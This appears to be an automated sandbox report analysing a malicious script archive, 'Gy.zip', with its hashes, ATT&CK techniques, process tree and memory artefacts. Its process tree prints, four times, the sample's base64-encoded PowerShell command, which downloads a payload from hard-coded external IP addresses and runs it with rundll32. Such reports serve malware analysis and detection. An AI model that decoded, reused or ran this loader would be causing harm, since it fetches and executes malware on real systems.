9458091e755b58ab950df66f1cd96ec11731334a19ac43697fe7258554bc59cb

General

Target

Gy.zip
Size

27KB
MD5

7acd362f944402abc4d4fa5aee43014f
SHA1

705345a59a6af865ef7610240f5e781155ff91bd
SHA256

9458091e755b58ab950df66f1cd96ec11731334a19ac43697fe7258554bc59cb
SHA512

a0994cdf3fd83154aaf466c96c5530124db8b7ab33a35da47ca0126815d2f551dbf3a4763e09fd50676cfc42d555a1eb938fd632543460817bd8e961728b351b
SSDEEP

768:4V8t94e2sO0sd1Rfj2vriKoj6L4YpTjcNIr/WGhf7b3nAuT0Z:oc94/sO5Rfj+VsQkyrVfXVW

Score

8^/10

Malware Config

Signatures

Blocklisted process makes network request 12 IoCs

flow	pid	Process
41	2736	powershell.exe
42	2736	powershell.exe
43	2736	powershell.exe
47	2068	powershell.exe
48	2068	powershell.exe
49	2068	powershell.exe
50	332	powershell.exe
51	332	powershell.exe
52	332	powershell.exe
53	4328	powershell.exe
54	4328	powershell.exe
55	4328	powershell.exe

Checks computer location settings 2 TTPs 8 IoCs

Looks up country code configured in the registry, likely geofence.

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key value queried	\REGISTRY\USER\S-1-5-21-2275444769-3691835758-4097679484-1000\Control Panel\International\Geo\Nation	wscript.exe
Key value queried	\REGISTRY\USER\S-1-5-21-2275444769-3691835758-4097679484-1000\Control Panel\International\Geo\Nation	WScript.exe
Key value queried	\REGISTRY\USER\S-1-5-21-2275444769-3691835758-4097679484-1000\Control Panel\International\Geo\Nation	wscript.exe
Key value queried	\REGISTRY\USER\S-1-5-21-2275444769-3691835758-4097679484-1000\Control Panel\International\Geo\Nation	WScript.exe
Key value queried	\REGISTRY\USER\S-1-5-21-2275444769-3691835758-4097679484-1000\Control Panel\International\Geo\Nation	wscript.exe
Key value queried	\REGISTRY\USER\S-1-5-21-2275444769-3691835758-4097679484-1000\Control Panel\International\Geo\Nation	WScript.exe
Key value queried	\REGISTRY\USER\S-1-5-21-2275444769-3691835758-4097679484-1000\Control Panel\International\Geo\Nation	wscript.exe
Key value queried	\REGISTRY\USER\S-1-5-21-2275444769-3691835758-4097679484-1000\Control Panel\International\Geo\Nation	WScript.exe

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

Modifies registry class 1 IoCs

description	ioc	Process
Key created	\REGISTRY\USER\S-1-5-21-2275444769-3691835758-4097679484-1000_Classes\Local Settings	OpenWith.exe

Suspicious behavior: EnumeratesProcesses 8 IoCs

pid	Process
2736	powershell.exe
2736	powershell.exe
2068	powershell.exe
2068	powershell.exe
332	powershell.exe
332	powershell.exe
4328	powershell.exe
4328	powershell.exe

Suspicious use of AdjustPrivilegeToken 9 IoCs

description	pid	Process
Token: SeDebugPrivilege	2736	powershell.exe
Token: SeDebugPrivilege	2068	powershell.exe
Token: SeDebugPrivilege	332	powershell.exe
Token: SeDebugPrivilege	4328	powershell.exe
Token: SeBackupPrivilege	4104	svchost.exe
Token: SeRestorePrivilege	4104	svchost.exe
Token: SeSecurityPrivilege	4104	svchost.exe
Token: SeTakeOwnershipPrivilege	4104	svchost.exe
Token: 35	4104	svchost.exe

Suspicious use of SetWindowsHookEx 5 IoCs

pid	Process
3204	OpenWith.exe
3204	OpenWith.exe
3204	OpenWith.exe
3204	OpenWith.exe
3204	OpenWith.exe

Suspicious use of WriteProcessMemory 16 IoCs

description	pid	Process	procid_target
PID 4396 wrote to memory of 3772	4396	WScript.exe	92
PID 4396 wrote to memory of 3772	4396	WScript.exe	92
PID 3772 wrote to memory of 2736	3772	wscript.exe	93
PID 3772 wrote to memory of 2736	3772	wscript.exe	93
PID 4300 wrote to memory of 4104	4300	WScript.exe	96
PID 4300 wrote to memory of 4104	4300	WScript.exe	96
PID 4104 wrote to memory of 2068	4104	wscript.exe	97
PID 4104 wrote to memory of 2068	4104	wscript.exe	97
PID 2184 wrote to memory of 2216	2184	WScript.exe	100
PID 2184 wrote to memory of 2216	2184	WScript.exe	100
PID 2216 wrote to memory of 332	2216	wscript.exe	101
PID 2216 wrote to memory of 332	2216	wscript.exe	101
PID 3740 wrote to memory of 1212	3740	WScript.exe	104
PID 3740 wrote to memory of 1212	3740	WScript.exe	104
PID 1212 wrote to memory of 4328	1212	wscript.exe	105
PID 1212 wrote to memory of 4328	1212	wscript.exe	105

C:\Windows\Explorer.exe
C:\Windows\Explorer.exe /idlist,,C:\Users\Admin\AppData\Local\Temp\Gy.zip
1⤵
PID:2112

C:\Windows\System32\rundll32.exe
C:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,SHCreateLocalServerRunDll {9aa46009-3ce0-458a-a354-715610a075e6} -Embedding
1⤵
PID:1956

C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\Temp1_Gy.zip\Pxcv.js"
1⤵
- Checks computer location settings
- Suspicious use of WriteProcessMemory
PID:4396
- C:\Windows\System32\wscript.exe
  "C:\Windows\System32\wscript.exe" "C:\Users\Admin\AppData\Local\Temp\Temp1_Gy.zip\Pxcv.js" Linearization NeurotherapistHidrocystoma
  2⤵
  - Checks computer location settings
  - Suspicious use of WriteProcessMemory
  PID:3772
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -encodedcommand "UwB0AGEAcgB0AC0AUwBsAGUAZQBwACAALQBTAGUAYwBvAG4AZABzACAANgA3ADsAJABPAGkAbgBvAGwAbwBnAGkAZQBzAE0AZQB0AGgAeQBsAGkAYwAgAD0AIAAoACIAaAB0AHQAcAA6AC8ALwAxADYAMgAuADIANQAyAC4AMQA3ADUALgAxADQAOAAvADcAbABMAHUALwBOAEMAUQB0AE0ARgBYAHUAcgAsAGgAdAB0AHAAOgAvAC8AMQAwADQALgAyADMANAAuADEAMAAuADYANwAvADAAZwBlADcAbgBHAC8ARwBjAGcAQgBVAHAALABoAHQAdABwADoALwAvADEANgAyAC4AMgA1ADIALgAxADcANQAuADEAOAA5AC8AYwBmAFYAcwB6AHMANQAvAFMARQB6ADUATQAzAFAAUwAiACkALgBzAHAAbABpAHQAKAAiACwAIgApADsAZgBvAHIAZQBhAGMAaAAgACgAJABTAHUAcABlAHIAaQBtAHAAZQByAHMAbwBuAGEAbAAgAGkAbgAgACQATwBpAG4AbwBsAG8AZwBpAGUAcwBNAGUAdABoAHkAbABpAGMAKQAgAHsAdAByAHkAIAB7AHcAZwBlAHQAIAAkAFMAdQBwAGUAcgBpAG0AcABlAHIAcwBvAG4AYQBsACAALQBUAGkAbQBlAG8AdQB0AFMAZQBjACAAMQA1ACAALQBPACAAJABlAG4AdgA6AFQARQBNAFAAXABBAG4AdABpAHQAbwBiAGEAYwBjAG8AbgBpAHMAdABOAGkAZABkAGkAYwBvAGMAawAuAHMAYwBhAHIAYQBiAGEAZQBpAGYAbwByAG0AQQBiAHIAYQBuAGMAaABpAGEAbAA7AGkAZgAgACgAKABHAGUAdAAtAEkAdABlAG0AIAAkAGUAbgB2ADoAVABFAE0AUABcAEEAbgB0AGkAdABvAGIAYQBjAGMAbwBuAGkAcwB0AE4AaQBkAGQAaQBjAG8AYwBrAC4AcwBjAGEAcgBhAGIAYQBlAGkAZgBvAHIAbQBBAGIAcgBhAG4AYwBoAGkAYQBsACkALgBsAGUAbgBnAHQAaAAgAC0AZwBlACAANQAwADAAMAAwACkAIAB7AHAAbwB3AGUAcgBzAGgAZQBsAGwAIAAtAGUAbgBjAG8AZABlAGQAYwBvAG0AbQBhAG4AZAAgACIAYwB3AEIAMABBAEcARQBBAGMAZwBCADAAQQBDAEEAQQBjAGcAQgAxAEEARwA0AEEAWgBBAEIAcwBBAEcAdwBBAE0AdwBBAHkAQQBDAEEAQQBKAEEAQgBsAEEARwA0AEEAZABnAEEANgBBAEYAUQBBAFIAUQBCAE4AQQBGAEEAQQBYAEEAQgBCAEEARwA0AEEAZABBAEIAcABBAEgAUQBBAGIAdwBCAGkAQQBHAEUAQQBZAHcAQgBqAEEARwA4AEEAYgBnAEIAcABBAEgATQBBAGQAQQBCAE8AQQBHAGsAQQBaAEEAQgBrAEEARwBrAEEAWQB3AEIAdgBBAEcATQBBAGEAdwBBAHUAQQBIAE0AQQBZAHcAQgBoAEEASABJAEEAWQBRAEIAaQBBAEcARQBBAFoAUQBCAHAAQQBHAFkAQQBiAHcAQgB5AEEARwAwAEEAUQBRAEIAaQBBAEgASQBBAFkAUQBCAHUAQQBHAE0AQQBhAEEAQgBwAEEARwBFAEEAYgBBAEEAcwBBAEYAUQBBAGEAUQBCAHQAQQBHAFUAQQBPAHcAQQA9ACIAOwBiAHIAZQBhAGsAOwB9AH0AYwBhAHQAYwBoACAAewBTAHQAYQByAHQALQBTAGwAZQBlAHAAIAAtAFMAZQBjAG8AbgBkAHMAIAAzADsAfQB9AA=="
    3⤵
    - Blocklisted process makes network request
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    PID:2736

C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\Temp1_Gy.zip\Pxcv.js"
1⤵
- Checks computer location settings
- Suspicious use of WriteProcessMemory
PID:4300
- C:\Windows\System32\wscript.exe
  "C:\Windows\System32\wscript.exe" "C:\Users\Admin\AppData\Local\Temp\Temp1_Gy.zip\Pxcv.js" Linearization NeurotherapistHidrocystoma
  2⤵
  - Checks computer location settings
  - Suspicious use of WriteProcessMemory
  PID:4104
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -encodedcommand "UwB0AGEAcgB0AC0AUwBsAGUAZQBwACAALQBTAGUAYwBvAG4AZABzACAANgA3ADsAJABPAGkAbgBvAGwAbwBnAGkAZQBzAE0AZQB0AGgAeQBsAGkAYwAgAD0AIAAoACIAaAB0AHQAcAA6AC8ALwAxADYAMgAuADIANQAyAC4AMQA3ADUALgAxADQAOAAvADcAbABMAHUALwBOAEMAUQB0AE0ARgBYAHUAcgAsAGgAdAB0AHAAOgAvAC8AMQAwADQALgAyADMANAAuADEAMAAuADYANwAvADAAZwBlADcAbgBHAC8ARwBjAGcAQgBVAHAALABoAHQAdABwADoALwAvADEANgAyAC4AMgA1ADIALgAxADcANQAuADEAOAA5AC8AYwBmAFYAcwB6AHMANQAvAFMARQB6ADUATQAzAFAAUwAiACkALgBzAHAAbABpAHQAKAAiACwAIgApADsAZgBvAHIAZQBhAGMAaAAgACgAJABTAHUAcABlAHIAaQBtAHAAZQByAHMAbwBuAGEAbAAgAGkAbgAgACQATwBpAG4AbwBsAG8AZwBpAGUAcwBNAGUAdABoAHkAbABpAGMAKQAgAHsAdAByAHkAIAB7AHcAZwBlAHQAIAAkAFMAdQBwAGUAcgBpAG0AcABlAHIAcwBvAG4AYQBsACAALQBUAGkAbQBlAG8AdQB0AFMAZQBjACAAMQA1ACAALQBPACAAJABlAG4AdgA6AFQARQBNAFAAXABBAG4AdABpAHQAbwBiAGEAYwBjAG8AbgBpAHMAdABOAGkAZABkAGkAYwBvAGMAawAuAHMAYwBhAHIAYQBiAGEAZQBpAGYAbwByAG0AQQBiAHIAYQBuAGMAaABpAGEAbAA7AGkAZgAgACgAKABHAGUAdAAtAEkAdABlAG0AIAAkAGUAbgB2ADoAVABFAE0AUABcAEEAbgB0AGkAdABvAGIAYQBjAGMAbwBuAGkAcwB0AE4AaQBkAGQAaQBjAG8AYwBrAC4AcwBjAGEAcgBhAGIAYQBlAGkAZgBvAHIAbQBBAGIAcgBhAG4AYwBoAGkAYQBsACkALgBsAGUAbgBnAHQAaAAgAC0AZwBlACAANQAwADAAMAAwACkAIAB7AHAAbwB3AGUAcgBzAGgAZQBsAGwAIAAtAGUAbgBjAG8AZABlAGQAYwBvAG0AbQBhAG4AZAAgACIAYwB3AEIAMABBAEcARQBBAGMAZwBCADAAQQBDAEEAQQBjAGcAQgAxAEEARwA0AEEAWgBBAEIAcwBBAEcAdwBBAE0AdwBBAHkAQQBDAEEAQQBKAEEAQgBsAEEARwA0AEEAZABnAEEANgBBAEYAUQBBAFIAUQBCAE4AQQBGAEEAQQBYAEEAQgBCAEEARwA0AEEAZABBAEIAcABBAEgAUQBBAGIAdwBCAGkAQQBHAEUAQQBZAHcAQgBqAEEARwA4AEEAYgBnAEIAcABBAEgATQBBAGQAQQBCAE8AQQBHAGsAQQBaAEEAQgBrAEEARwBrAEEAWQB3AEIAdgBBAEcATQBBAGEAdwBBAHUAQQBIAE0AQQBZAHcAQgBoAEEASABJAEEAWQBRAEIAaQBBAEcARQBBAFoAUQBCAHAAQQBHAFkAQQBiAHcAQgB5AEEARwAwAEEAUQBRAEIAaQBBAEgASQBBAFkAUQBCAHUAQQBHAE0AQQBhAEEAQgBwAEEARwBFAEEAYgBBAEEAcwBBAEYAUQBBAGEAUQBCAHQAQQBHAFUAQQBPAHcAQQA9ACIAOwBiAHIAZQBhAGsAOwB9AH0AYwBhAHQAYwBoACAAewBTAHQAYQByAHQALQBTAGwAZQBlAHAAIAAtAFMAZQBjAG8AbgBkAHMAIAAzADsAfQB9AA=="
    3⤵
    - Blocklisted process makes network request
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    PID:2068

C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\Temp1_Gy.zip\Pxcv.js"
1⤵
- Checks computer location settings
- Suspicious use of WriteProcessMemory
PID:2184
- C:\Windows\System32\wscript.exe
  "C:\Windows\System32\wscript.exe" "C:\Users\Admin\AppData\Local\Temp\Temp1_Gy.zip\Pxcv.js" Linearization NeurotherapistHidrocystoma
  2⤵
  - Checks computer location settings
  - Suspicious use of WriteProcessMemory
  PID:2216
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -encodedcommand "UwB0AGEAcgB0AC0AUwBsAGUAZQBwACAALQBTAGUAYwBvAG4AZABzACAANgA3ADsAJABPAGkAbgBvAGwAbwBnAGkAZQBzAE0AZQB0AGgAeQBsAGkAYwAgAD0AIAAoACIAaAB0AHQAcAA6AC8ALwAxADYAMgAuADIANQAyAC4AMQA3ADUALgAxADQAOAAvADcAbABMAHUALwBOAEMAUQB0AE0ARgBYAHUAcgAsAGgAdAB0AHAAOgAvAC8AMQAwADQALgAyADMANAAuADEAMAAuADYANwAvADAAZwBlADcAbgBHAC8ARwBjAGcAQgBVAHAALABoAHQAdABwADoALwAvADEANgAyAC4AMgA1ADIALgAxADcANQAuADEAOAA5AC8AYwBmAFYAcwB6AHMANQAvAFMARQB6ADUATQAzAFAAUwAiACkALgBzAHAAbABpAHQAKAAiACwAIgApADsAZgBvAHIAZQBhAGMAaAAgACgAJABTAHUAcABlAHIAaQBtAHAAZQByAHMAbwBuAGEAbAAgAGkAbgAgACQATwBpAG4AbwBsAG8AZwBpAGUAcwBNAGUAdABoAHkAbABpAGMAKQAgAHsAdAByAHkAIAB7AHcAZwBlAHQAIAAkAFMAdQBwAGUAcgBpAG0AcABlAHIAcwBvAG4AYQBsACAALQBUAGkAbQBlAG8AdQB0AFMAZQBjACAAMQA1ACAALQBPACAAJABlAG4AdgA6AFQARQBNAFAAXABBAG4AdABpAHQAbwBiAGEAYwBjAG8AbgBpAHMAdABOAGkAZABkAGkAYwBvAGMAawAuAHMAYwBhAHIAYQBiAGEAZQBpAGYAbwByAG0AQQBiAHIAYQBuAGMAaABpAGEAbAA7AGkAZgAgACgAKABHAGUAdAAtAEkAdABlAG0AIAAkAGUAbgB2ADoAVABFAE0AUABcAEEAbgB0AGkAdABvAGIAYQBjAGMAbwBuAGkAcwB0AE4AaQBkAGQAaQBjAG8AYwBrAC4AcwBjAGEAcgBhAGIAYQBlAGkAZgBvAHIAbQBBAGIAcgBhAG4AYwBoAGkAYQBsACkALgBsAGUAbgBnAHQAaAAgAC0AZwBlACAANQAwADAAMAAwACkAIAB7AHAAbwB3AGUAcgBzAGgAZQBsAGwAIAAtAGUAbgBjAG8AZABlAGQAYwBvAG0AbQBhAG4AZAAgACIAYwB3AEIAMABBAEcARQBBAGMAZwBCADAAQQBDAEEAQQBjAGcAQgAxAEEARwA0AEEAWgBBAEIAcwBBAEcAdwBBAE0AdwBBAHkAQQBDAEEAQQBKAEEAQgBsAEEARwA0AEEAZABnAEEANgBBAEYAUQBBAFIAUQBCAE4AQQBGAEEAQQBYAEEAQgBCAEEARwA0AEEAZABBAEIAcABBAEgAUQBBAGIAdwBCAGkAQQBHAEUAQQBZAHcAQgBqAEEARwA4AEEAYgBnAEIAcABBAEgATQBBAGQAQQBCAE8AQQBHAGsAQQBaAEEAQgBrAEEARwBrAEEAWQB3AEIAdgBBAEcATQBBAGEAdwBBAHUAQQBIAE0AQQBZAHcAQgBoAEEASABJAEEAWQBRAEIAaQBBAEcARQBBAFoAUQBCAHAAQQBHAFkAQQBiAHcAQgB5AEEARwAwAEEAUQBRAEIAaQBBAEgASQBBAFkAUQBCAHUAQQBHAE0AQQBhAEEAQgBwAEEARwBFAEEAYgBBAEEAcwBBAEYAUQBBAGEAUQBCAHQAQQBHAFUAQQBPAHcAQQA9ACIAOwBiAHIAZQBhAGsAOwB9AH0AYwBhAHQAYwBoACAAewBTAHQAYQByAHQALQBTAGwAZQBlAHAAIAAtAFMAZQBjAG8AbgBkAHMAIAAzADsAfQB9AA=="
    3⤵
    - Blocklisted process makes network request
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    PID:332

C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\Temp1_Gy.zip\Pxcv.js"
1⤵
- Checks computer location settings
- Suspicious use of WriteProcessMemory
PID:3740
- C:\Windows\System32\wscript.exe
  "C:\Windows\System32\wscript.exe" "C:\Users\Admin\AppData\Local\Temp\Temp1_Gy.zip\Pxcv.js" Linearization NeurotherapistHidrocystoma
  2⤵
  - Checks computer location settings
  - Suspicious use of WriteProcessMemory
  PID:1212
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -encodedcommand "UwB0AGEAcgB0AC0AUwBsAGUAZQBwACAALQBTAGUAYwBvAG4AZABzACAANgA3ADsAJABPAGkAbgBvAGwAbwBnAGkAZQBzAE0AZQB0AGgAeQBsAGkAYwAgAD0AIAAoACIAaAB0AHQAcAA6AC8ALwAxADYAMgAuADIANQAyAC4AMQA3ADUALgAxADQAOAAvADcAbABMAHUALwBOAEMAUQB0AE0ARgBYAHUAcgAsAGgAdAB0AHAAOgAvAC8AMQAwADQALgAyADMANAAuADEAMAAuADYANwAvADAAZwBlADcAbgBHAC8ARwBjAGcAQgBVAHAALABoAHQAdABwADoALwAvADEANgAyAC4AMgA1ADIALgAxADcANQAuADEAOAA5AC8AYwBmAFYAcwB6AHMANQAvAFMARQB6ADUATQAzAFAAUwAiACkALgBzAHAAbABpAHQAKAAiACwAIgApADsAZgBvAHIAZQBhAGMAaAAgACgAJABTAHUAcABlAHIAaQBtAHAAZQByAHMAbwBuAGEAbAAgAGkAbgAgACQATwBpAG4AbwBsAG8AZwBpAGUAcwBNAGUAdABoAHkAbABpAGMAKQAgAHsAdAByAHkAIAB7AHcAZwBlAHQAIAAkAFMAdQBwAGUAcgBpAG0AcABlAHIAcwBvAG4AYQBsACAALQBUAGkAbQBlAG8AdQB0AFMAZQBjACAAMQA1ACAALQBPACAAJABlAG4AdgA6AFQARQBNAFAAXABBAG4AdABpAHQAbwBiAGEAYwBjAG8AbgBpAHMAdABOAGkAZABkAGkAYwBvAGMAawAuAHMAYwBhAHIAYQBiAGEAZQBpAGYAbwByAG0AQQBiAHIAYQBuAGMAaABpAGEAbAA7AGkAZgAgACgAKABHAGUAdAAtAEkAdABlAG0AIAAkAGUAbgB2ADoAVABFAE0AUABcAEEAbgB0AGkAdABvAGIAYQBjAGMAbwBuAGkAcwB0AE4AaQBkAGQAaQBjAG8AYwBrAC4AcwBjAGEAcgBhAGIAYQBlAGkAZgBvAHIAbQBBAGIAcgBhAG4AYwBoAGkAYQBsACkALgBsAGUAbgBnAHQAaAAgAC0AZwBlACAANQAwADAAMAAwACkAIAB7AHAAbwB3AGUAcgBzAGgAZQBsAGwAIAAtAGUAbgBjAG8AZABlAGQAYwBvAG0AbQBhAG4AZAAgACIAYwB3AEIAMABBAEcARQBBAGMAZwBCADAAQQBDAEEAQQBjAGcAQgAxAEEARwA0AEEAWgBBAEIAcwBBAEcAdwBBAE0AdwBBAHkAQQBDAEEAQQBKAEEAQgBsAEEARwA0AEEAZABnAEEANgBBAEYAUQBBAFIAUQBCAE4AQQBGAEEAQQBYAEEAQgBCAEEARwA0AEEAZABBAEIAcABBAEgAUQBBAGIAdwBCAGkAQQBHAEUAQQBZAHcAQgBqAEEARwA4AEEAYgBnAEIAcABBAEgATQBBAGQAQQBCAE8AQQBHAGsAQQBaAEEAQgBrAEEARwBrAEEAWQB3AEIAdgBBAEcATQBBAGEAdwBBAHUAQQBIAE0AQQBZAHcAQgBoAEEASABJAEEAWQBRAEIAaQBBAEcARQBBAFoAUQBCAHAAQQBHAFkAQQBiAHcAQgB5AEEARwAwAEEAUQBRAEIAaQBBAEgASQBBAFkAUQBCAHUAQQBHAE0AQQBhAEEAQgBwAEEARwBFAEEAYgBBAEEAcwBBAEYAUQBBAGEAUQBCAHQAQQBHAFUAQQBPAHcAQQA9ACIAOwBiAHIAZQBhAGsAOwB9AH0AYwBhAHQAYwBoACAAewBTAHQAYQByAHQALQBTAGwAZQBlAHAAIAAtAFMAZQBjAG8AbgBkAHMAIAAzADsAfQB9AA=="
    3⤵
    - Blocklisted process makes network request
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    PID:4328

C:\Windows\system32\OpenWith.exe
C:\Windows\system32\OpenWith.exe -Embedding
1⤵
- Modifies registry class
- Suspicious use of SetWindowsHookEx
PID:3204

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k SDRSVC
1⤵
- Suspicious use of AdjustPrivilegeToken
PID:4104

Network

MITRE ATT&CK Enterprise v6

Initial Access

Execution

Persistence

Privilege Escalation

Defense Evasion

Credential Access

Discovery

Query Registry

1

T1012

System Information Discovery

2

T1082

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log

Filesize
3KB

MD5
556084f2c6d459c116a69d6fedcc4105

SHA1
633e89b9a1e77942d822d14de6708430a3944dbc

SHA256
88cc4f40f0eb08ff5c487d6db341b046cc63b22534980aca66a9f8480692f3a8

SHA512
0f6557027b098e45556af93e0be1db9a49c6416dc4afcff2cc2135a8a1ad4f1cf7185541ddbe6c768aefaf2c1a8e52d5282a538d15822d19932f22316edd283e

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
1KB

MD5
e48aa969afe288ca956d579c869cb78b

SHA1
3cf9f9450e8fa846c8e731e66f85041624e98541

SHA256
290aab67e5610ce1c517e843cefb2e22bfb602f659595a9c6cf8511da46d86b2

SHA512
35fed558bf712def61ff7e959abbded2ea7c6cf030eea80abb50d3a153768dcf728c386b2f7004c84991b141c6fe08a2590519f5177304a7f1e64f594ec05005

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
600B

MD5
fa3451681761dffae909329866def21b

SHA1
e5c04b758690779f4accfe8f34363b42a6308ee4

SHA256
5872922314147ccf2e76d1679153db75add1da710b8827aca02893207c29b899

SHA512
573a4ed3307885ced2593af555bdfc77fff1a1ba9cd4d591508b1b214a033968c65e40284c7a59271dba06d2eada73340fa3d478c8dc3797fa4562bbc8ea6f22

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
1KB

MD5
23dc3b3280c3159a4731608ccab1c5d7

SHA1
6b2f95cbc74c129f40048377fba341b1e7633f58

SHA256
fff52d9b672eadfcd31b6dbd88572b1c4c882bcfbcde717ed1b5b780d7e44264

SHA512
fe83b97772a2253fe39ef7c1c214f2f9859d89402abbd4c5e94b0f1b584f49ad5c88f4f0d2af06601be29e6b9cc61f0ddd22053a19e14adac85150fcdea7936f

Download Submit
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_1cnmpo4c.uny.ps1

Filesize
60B

MD5
d17fe0a3f47be24a6453e9ef58c94641

SHA1
6ab83620379fc69f80c0242105ddffd7d98d5d9d

SHA256
96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

SHA512
5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

Download Submit
memory/332-188-0x0000019EAEFC0000-0x0000019EAEFD0000-memory.dmp

Filesize
64KB

Download
memory/332-170-0x0000019EAEFC0000-0x0000019EAEFD0000-memory.dmp

Filesize
64KB

Download
memory/332-189-0x0000019EAEFC0000-0x0000019EAEFD0000-memory.dmp

Filesize
64KB

Download
memory/332-187-0x0000019EAEFC0000-0x0000019EAEFD0000-memory.dmp

Filesize
64KB

Download
memory/332-171-0x0000019EAEFC0000-0x0000019EAEFD0000-memory.dmp

Filesize
64KB

Download
memory/332-169-0x0000019EAEFC0000-0x0000019EAEFD0000-memory.dmp

Filesize
64KB

Download
memory/2068-159-0x000001F79D180000-0x000001F79D190000-memory.dmp

Filesize
64KB

Download
memory/2068-158-0x000001F79D180000-0x000001F79D190000-memory.dmp

Filesize
64KB

Download
memory/2068-157-0x000001F79D180000-0x000001F79D190000-memory.dmp

Filesize
64KB

Download
memory/2736-145-0x000001DA55D60000-0x000001DA55D70000-memory.dmp

Filesize
64KB

Download
memory/2736-156-0x000001DA55D60000-0x000001DA55D70000-memory.dmp

Filesize
64KB

Download
memory/2736-143-0x000001DA55D60000-0x000001DA55D70000-memory.dmp

Filesize
64KB

Download
memory/2736-144-0x000001DA55D60000-0x000001DA55D70000-memory.dmp

Filesize
64KB

Download
memory/2736-155-0x000001DA55D60000-0x000001DA55D70000-memory.dmp

Filesize
64KB

Download
memory/2736-133-0x000001DA6F920000-0x000001DA6F942000-memory.dmp

Filesize
136KB

Download
memory/4328-186-0x0000024A26DD0000-0x0000024A26DE0000-memory.dmp

Filesize
64KB

Download
memory/4328-192-0x0000024A26DD0000-0x0000024A26DE0000-memory.dmp

Filesize
64KB

Download
memory/4328-193-0x0000024A26DD0000-0x0000024A26DE0000-memory.dmp

Filesize
64KB

Download
memory/4328-194-0x0000024A26DD0000-0x0000024A26DE0000-memory.dmp

Filesize
64KB

Download
memory/4328-185-0x0000024A26DD0000-0x0000024A26DE0000-memory.dmp

Filesize
64KB

Download
memory/4328-184-0x0000024A26DD0000-0x0000024A26DE0000-memory.dmp

Filesize
64KB

Download

Analysis

Sharing